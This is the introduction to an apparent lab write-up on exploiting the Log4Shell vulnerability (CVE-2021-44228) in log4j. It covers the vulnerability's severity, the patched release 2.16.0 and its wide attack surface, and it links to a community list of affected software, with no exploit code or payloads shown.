# Solar, Exploiting log4j

"On December 9th, 2021, the world was made aware of a new vulnerability identified as CVE-2021-44228, affecting the Java logging package **`log4j`**. This vulnerability earned a severity score of 10.0 (the most critical designation) and offers remote code trivial remote code execution on hosts engaging with software that utilizes this **`log4j`** version. This attack has been dubbed "Log4Shell"

Today, **`log4j`** version **`2.16.0`** is available and patches this vulnerability (JNDI is fully disabled, support for Message Lookups is removed, and the new DoS vulnerability CVE-2021-45046 is not present). <https://github.com/apache/logging-log4j2/releases/tag/rel%2F2.16.0>

However, the sheer danger of this vulnerability is due to how ubiquitous the logging package is. Millions of applications as well as software providers use this package as a dependency in their own code. While you may be able to patch your own codebase using **`log4j`**, other vendors and manufacturers will still need to push their own security updates downstream. Many security researchers have likened this vulnerability to that of [Shellshock](https://en.wikipedia.org/wiki/Shellshock_\(software_bug\)) by the nature of its enormous attack surface. We will see this vulnerability for years to come."<br>

For a growing community-supported list of software and services vulnerable to CVE-2021-44228, check out this GitHub repository:

* <https://github.com/YfryTchsGD/Log4jAttackSurface>&#x20;